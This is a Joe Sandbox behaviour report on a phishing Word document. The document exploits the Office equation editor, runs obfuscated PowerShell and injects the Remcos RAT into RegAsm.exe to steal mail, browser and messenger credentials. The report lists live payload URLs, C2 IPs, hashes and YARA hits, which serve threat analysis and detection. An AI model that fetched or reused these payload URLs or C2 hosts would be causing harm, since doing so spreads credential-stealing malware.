                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 16_2_00402DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 16_2_00402DB3
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1060, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-IAW1Y3
                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.919651598.0000000000321000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR
                Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 13_2_0040569A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts11
                Native API
                111
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                13
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts43
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                Bypass User Account Control
                2
                Obfuscated Files or Information
                211
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts122
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Access Token Manipulation
                1
                DLL Side-Loading
                2
                Credentials in Registry
                1
                System Service Discovery
                SMB/Windows Admin Shares2
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook1
                Windows Service
                1
                Bypass User Account Control
                3
                Credentials In Files
                4
                File and Directory Discovery
                Distributed Component Object Model211
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts3
                PowerShell
                Network Logon Script422
                Process Injection
                1
                Masquerading
                LSA Secrets38
                System Information Discovery
                SSH3
                Clipboard Data
                2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials3
                Security Software Discovery
                VNCGUI Input Capture113
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync21
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                Process Injection
                Proc Filesystem4
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1523191
Sample: Scan Order and Specificatio...
Startdate: 01/10/2024
Architecture: WINDOWS
Score: 100

Behavior graph, flattened into the process tree it depicts. Numbers in parentheses after a process are the graph's created-registry-value / created-file counts (see the legend above); where the graph shows only one number it is reproduced as-is.

Start: og1.in
    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures
    WINWORD.EXE (308 / 48)
        DNS/IP: og1.in 172.67.216.244, ports 443, 49161, 49162, CLOUDFLARENETUS, United States
        DNS/IP: 104.168.7.8, ports 49167, 49169, 49171, AS-COLOCROSSINGUS, United States
        Dropped: C:\Users\user\...\RN on 104.168.7.8.url (MS)
        Dropped: C:\Users\user\AppData\Roaming\...\9aubsm.url (MS)
        Dropped: ~WRF{E867F054-9E2E...D-A2E82224CF64}.tmp (Composite)
        Dropped: 2 other malicious files
        Signatures: Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files
        EQNEDT32.EXE (12)
            Dropped: C:\Users\...\niceworkwithpcitureupdateson.vBS (Unicode)
            Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            wscript.exe (1)
                Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
                powershell.exe (4)
                    Signatures: Suspicious powershell command line found; Obfuscated command line found; Suspicious execution chain found
                    powershell.exe (12 / 5)
                        DNS/IP: raw.githubusercontent.com 185.199.111.133, ports 443, 49170, FASTLYUS, Netherlands
                        Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                        RegAsm.exe (3 / 13)
                            DNS/IP: 103.186.116.99, ports 49172, 49173, 49175, AARNET-AS-APAustralianAcademicandResearchNetworkAARNe, unknown
                            DNS/IP: geoplugin.net 178.237.33.50, ports 49174, 80, ATOM86-ASATOM86NL, Netherlands
                            Dropped: C:\Users\user\AppData\Local\Temp\...\logs.dat (data)
                            Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 8 other signatures
                            RegAsm.exe (1)
                                Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
                            RegAsm.exe
                            RegAsm.exe
                                Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                            4 other processes

Source | Detection | Scanner | Label
Scan Order and Specification 01-10- 2024.docx | 8% | Virustotal | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc | 100% | Avira | HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc | 100% | Avira | HEUR/Rtf.Malformed

No Antivirus matches

Source | Detection | Scanner | Label
og1.in | 2% | Virustotal | -
raw.githubusercontent.com | 0% | Virustotal | -
geoplugin.net | 0% | Virustotal | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
og1.in | 172.67.216.244 | true | true | - | unknown
raw.githubusercontent.com | 185.199.111.133 | true | false | - | unknown
geoplugin.net | 178.237.33.50 | true | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | - | unknown
https://og1.in/9aubsm | true | - | unknown
103.186.116.99 | true | - | unknown
http://104.168.7.8/510/RFGB.txt | true | - | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
http://104.168.7.8/510/niceworkwithpcitureupdateson.tIF | true | - | unknown
http://104.168.7.8/510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc | true | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.168.7.8 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
103.186.116.99 | unknown | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
172.67.216.244 | og1.in | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523191
Start date and time: 2024-10-01 09:24:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 21
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Scan Order and Specification 01-10- 2024.docx
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@24/33@9/5
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 71.4%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 188
                                                                                        • Number of non-executed functions: 271
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .docx
                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                        • Attach to Office via COM
                                                                                        • Scroll down
                                                                                        • Close Viewer
                                                                                        • Override analysis time to 79501.0550860841 for current running targets taking high CPU consumption
                                                                                        • Override analysis time to 159002.110172168 for current running targets taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                                                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3800 because there are no executed function
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:25:20  API Interceptor  39x Sleep call for process: EQNEDT32.EXE modified
03:25:22  API Interceptor  103x Sleep call for process: powershell.exe modified
03:25:22  API Interceptor  14x Sleep call for process: wscript.exe modified
03:25:32  API Interceptor  10634205x Sleep call for process: RegAsm.exe modified
Match / Associated Sample Name / URL / Detection / Threat Name / Context
178.237.33.50
• Payment proof.xls  [malicious: Remcos]  context: geoplugin.net/json.gp
• TT12822024.xls  [malicious: Remcos]  context: geoplugin.net/json.gp
• Cdp51q2lyM.exe  [malicious: Remcos]  context: geoplugin.net/json.gp
• 5UQ2Xybm0q.hta  [malicious: Cobalt Strike, Remcos, GuLoader]  context: geoplugin.net/json.gp
• Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exe  [malicious: Remcos, GuLoader]  context: geoplugin.net/json.gp
• AMG Cargo Logistic.docx  [malicious: Remcos]  context: geoplugin.net/json.gp
• factura proforma .docx.doc  [malicious: Remcos]  context: geoplugin.net/json.gp
• SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe  [malicious: Remcos, GuLoader]  context: geoplugin.net/json.gp
• z1Quotation.scr.exe  [malicious: Remcos, GuLoader]  context: geoplugin.net/json.gp
• V1ljXRn7Yo.exe  [malicious: Remcos]  context: geoplugin.net/json.gp
185.199.111.133
• DRAFT_PO.vbs  [malicious: Unknown]
• file.exe  [malicious: XWorm, Xmrig]
• SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe  [malicious: AsyncRAT, DcRat]
• https://rajkamalkanna.github.io/Facebook-Login-Page/  [malicious: HTMLPhisher]
• https://vinitk1509.github.io/NETFLIX  [malicious: HTMLPhisher]
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf  [malicious: Remcos]
• dvswiftsend_240917122612_9331095243.docx.doc  [malicious: Remcos]
• https://metmaskiloi.gitbook.io/us/  [malicious: HTMLPhisher]
• http://sis030.github.io/1_Netflix_Deepdive/  [malicious: HTMLPhisher]
• https://telagremn.com/  [malicious: Unknown]
103.186.116.99
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.18888.15372.rtf  [malicious: Remcos]
• another.rtf  [malicious: Remcos]
• rnr.exe  [malicious: Remcos]
• PO082724.xls  [malicious: Remcos]
• SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtf  [malicious: Remcos]
• SWIFT COPY.xls  [malicious: Remcos]
• PURCHASE ORDER.xls  [malicious: Remcos]
• SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.21143.24066.rtf  [malicious: Remcos]
• H4Rwoh18HK.hta  [malicious: Cobalt Strike, Remcos]
• PO060824.xls  [malicious: Remcos]
Match / Associated Sample Name / URL / Detection / Threat Name / Context
og1.in
• Payment proof.xls  [malicious: Remcos]  context: 172.67.216.244
• TT12822024.xls  [malicious: Remcos]  context: 172.67.216.244
• AE1169-0106202.xls  [malicious: Snake Keylogger]  context: 104.21.78.54
• AMG Cargo Logistic.docx  [malicious: Remcos]  context: 172.67.216.244
• factura proforma .docx.doc  [malicious: Remcos]  context: 172.67.216.244
• PI#0034250924.xla.xlsx  [malicious: FormBook]  context: 172.67.216.244
• PO554830092024.xls  [malicious: Unknown]  context: 104.21.78.54
• SYSN ORDER.xls  [malicious: Snake Keylogger]  context: 172.67.216.244
• PO554830092024.xls  [malicious: Unknown]  context: 104.21.78.54
• PI#0034250924.xla.xlsx  [malicious: Unknown]  context: 104.21.78.54
raw.githubusercontent.com
• Payment proof.xls  [malicious: Remcos]  context: 185.199.110.133
• DRAFT_PO.vbs  [malicious: Unknown]  context: 185.199.111.133
• AMG Cargo Logistic.docx  [malicious: Remcos]  context: 185.199.109.133
• file.exe  [malicious: XWorm, Xmrig]  context: 185.199.111.133
• factura proforma .docx.doc  [malicious: Remcos]  context: 185.199.109.133
• RFQ-5120240930 VENETA PESCA SRL.vbs  [malicious: VIP Keylogger]  context: 185.199.110.133
• SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe  [malicious: AsyncRAT, DcRat]  context: 185.199.110.133
• SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe  [malicious: AsyncRAT, DcRat]  context: 185.199.111.133
• C6DAEyTs7d.rtf  [malicious: Remcos]  context: 185.199.109.133
• SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf  [malicious: Remcos]  context: 185.199.111.133
geoplugin.net
• Payment proof.xls  [malicious: Remcos]  context: 178.237.33.50
• TT12822024.xls  [malicious: Remcos]  context: 178.237.33.50
• Cdp51q2lyM.exe  [malicious: Remcos]  context: 178.237.33.50
• 5UQ2Xybm0q.hta  [malicious: Cobalt Strike, Remcos, GuLoader]  context: 178.237.33.50
• Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exe  [malicious: Remcos, GuLoader]  context: 178.237.33.50
• AMG Cargo Logistic.docx  [malicious: Remcos]  context: 178.237.33.50
• factura proforma .docx.doc  [malicious: Remcos]  context: 178.237.33.50
• SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe  [malicious: Remcos, GuLoader]  context: 178.237.33.50
• z1Quotation.scr.exe  [malicious: Remcos, GuLoader]  context: 178.237.33.50
• V1ljXRn7Yo.exe  [malicious: Remcos]  context: 178.237.33.50
Match / Associated Sample Name / URL / Detection / Threat Name / Context
FASTLYUS
• https://app.getresponse.com/change_details.html?x=a62b&m=BrgFNl&s=BW9rcZD&u=C3YQM&z=EMkQID6&pt=change_details  [malicious: Unknown]  context: 151.101.129.140
• Payment proof.xls  [malicious: Remcos]  context: 185.199.110.133
• https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3D  [malicious: HTMLPhisher]  context: 151.101.65.224
• https://jv.prenticeu.com/SAFlSIeECgRZt_tUKXhAOQHYyqb5e4/  [malicious: HTMLPhisher]  context: 151.101.2.137
• https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdf  [malicious: HTMLPhisher]  context: 151.101.65.224
• https://bestratedrobotvacuum.com/?bypass-cdn=1  [malicious: Unknown]  context: 151.101.2.206
• https://taplink.cc/universalgrc  [malicious: Unknown]  context: 151.101.129.229
• American-equity Updated Employee sheet .odt  [malicious: HTMLPhisher]  context: 151.101.2.137
• DRAFT_PO.vbs  [malicious: Unknown]  context: 185.199.111.133
• (No subject) (82).eml  [malicious: Unknown]  context: 151.101.67.1
AS-COLOCROSSINGUS
• ORDER-24930-067548.js  [malicious: StormKitty, XWorm]  context: 192.210.215.11
• AE1169-0106202.xls  [malicious: Snake Keylogger]  context: 172.245.123.9
• 5UQ2Xybm0q.hta  [malicious: Cobalt Strike, Remcos, GuLoader]  context: 107.173.4.16
• SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe  [malicious: Remcos, GuLoader]  context: 107.173.4.16
• PI#0034250924.xla.xlsx  [malicious: FormBook]  context: 104.168.7.7
• SYSN ORDER.xls  [malicious: Snake Keylogger]  context: 172.245.123.6
• PI#0034250924.xla.xlsx  [malicious: Unknown]  context: 104.168.7.7
• PI#0034250924.xla.xlsx  [malicious: Unknown]  context: 104.168.7.7
• PO 11001 .xls  [malicious: Remcos, GuLoader]  context: 107.173.4.16
• ZIXBhdgf6y.exe  [malicious: Remcos]  context: 192.3.101.137
ATOM86-ASATOM86NL
• Payment proof.xls  [malicious: Remcos]  context: 178.237.33.50
• TT12822024.xls  [malicious: Remcos]  context: 178.237.33.50
• Cdp51q2lyM.exe  [malicious: Remcos]  context: 178.237.33.50
• 5UQ2Xybm0q.hta  [malicious: Cobalt Strike, Remcos, GuLoader]  context: 178.237.33.50
• Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exe  [malicious: Remcos, GuLoader]  context: 178.237.33.50
• AMG Cargo Logistic.docx  [malicious: Remcos]  context: 178.237.33.50
• factura proforma .docx.doc  [malicious: Remcos]  context: 178.237.33.50
• SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe  [malicious: Remcos, GuLoader]  context: 178.237.33.50
• z1Quotation.scr.exe  [malicious: Remcos, GuLoader]  context: 178.237.33.50
• V1ljXRn7Yo.exe  [malicious: Remcos]  context: 178.237.33.50
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
• Electronic_Receipt_ATT0001.htm  [malicious: Unknown]  context: 103.67.200.72
• V1ljXRn7Yo.exe  [malicious: Remcos]  context: 103.186.116.220
• Quote.exe  [malicious: Remcos]  context: 103.186.117.77
• Invoice and packing list (021)_pdf.exe  [malicious: Remcos]  context: 103.186.116.93
• https://en.softonic.com  [malicious: Unknown]  context: 103.67.200.72
• yVhGfho0R4.exe  [malicious: Remcos]  context: 103.186.116.220
• http://tkshopjp.top/  [malicious: Unknown]  context: 103.176.91.125
• Callus+1(814)-310-9943.pdf  [malicious: PayPal Phisher]  context: 103.163.152.75
• http://activa1dina.w3spaces.com/  [malicious: Unknown]  context: 103.67.200.72
• Quote.exe  [malicious: Remcos]  context: 103.186.117.77
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 05af1f5ca1b87cc9cc9b25185115607d
Payment proof.xls | malicious | Remcos | 185.199.111.133, 172.67.216.244
AE1169-0106202.xls | malicious | Snake Keylogger | 185.199.111.133, 172.67.216.244
AMG Cargo Logistic.docx | malicious | Remcos | 185.199.111.133, 172.67.216.244
factura proforma .docx.doc | malicious | Remcos | 185.199.111.133, 172.67.216.244
SYSN ORDER.xls | malicious | Snake Keylogger | 185.199.111.133, 172.67.216.244
C6DAEyTs7d.rtf | malicious | Remcos | 185.199.111.133, 172.67.216.244
SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 185.199.111.133, 172.67.216.244
dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 185.199.111.133, 172.67.216.244
58ADE05412907F657812BDA267C43288EA79418091.doc | malicious | Snake Keylogger, VIP Keylogger | 185.199.111.133, 172.67.216.244
New Order.doc | malicious | Snake Keylogger | 185.199.111.133, 172.67.216.244

Match: 7dcce5b76c8b17472d024758970a406b
Fatura 002.xlam.xlsx | malicious | AgentTesla | 172.67.216.244
Payment proof.xls | malicious | Remcos | 172.67.216.244
TT12822024.xls | malicious | Remcos | 172.67.216.244
AE1169-0106202.xls | malicious | Snake Keylogger | 172.67.216.244
AMG Cargo Logistic.docx | malicious | Remcos | 172.67.216.244
factura proforma .docx.doc | malicious | Remcos | 172.67.216.244
PI#0034250924.xla.xlsx | malicious | FormBook | 172.67.216.244
PO554830092024.xls | malicious | Unknown | 172.67.216.244
SYSN ORDER.xls | malicious | Snake Keylogger | 172.67.216.244
PO554830092024.xls | malicious | Unknown | 172.67.216.244

No context

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 131072
Entropy (8bit): 0.025577196307894484
Encrypted: false
SSDEEP: 6:I3DPcb5zxVvxggLRXy+gE3qMotRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQf7y+gYuvYg3J/
MD5: 2B6A45709F67C046DDB5A17D7F36171C
SHA1: 554EC1BE3FD1D3F2569433AFFF70C31E3281E40B
SHA-256: 65D3CE86B193F2092D008CB2B7DC637B807719A4F36B9755A17AB6B9FF7332CB
SHA-512: 835794624803B8F1CA3B4D6B2ACB8D0766B25FB5F0AAB932239C9204178D24B8303604E7DB64EF45873CDA0E3B9B812333279E9CEA5FCCD109664DDE8201F4B8
Malicious: false
Preview: ......M.eFy...z.b....F..=...xS,...X.F...Fa.q............................@|.....J......Jf........?,br.i.I.9_..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4760
Entropy (8bit): 4.834060479684549
Encrypted: false
SSDEEP: 96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5: 838C1F472806CF4BA2A9EC49C27C2847
SHA1: D1C63579585C4740956B099697C74AD3E7C89751
SHA-256: 40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512: E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious: false
Preview: PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................

Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Rich Text Format data, version 1
Category: dropped
Size (bytes): 69247
Entropy (8bit): 2.869208176365265
Encrypted: false
SSDEEP: 768:ZD+xsejlud5HY1ayCyu7OHAzlzjRYEX4Bo:ZGjE3qy7OglR9XWo
MD5: C9AC55D64A51738B57F065449C7E3911
SHA1: 7B9DD5B4E76E99D711B0FE11582E6FF06D9CA830
SHA-256: 8F76E86093D71F34C2E6F824984034185964F3D15C28DF1B61ADF5165FBB212E
SHA-512: 6D78C5A5CFC7FA34942E87CEAE41D6E97DEBAA9469831FFBC4482C9FC1B531A171B1A12FE6FF3902B8919AEE94BDF619CD0B43DABA07166D9E47042A9EAF8E60
Malicious: true
Yara Hits:
• Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
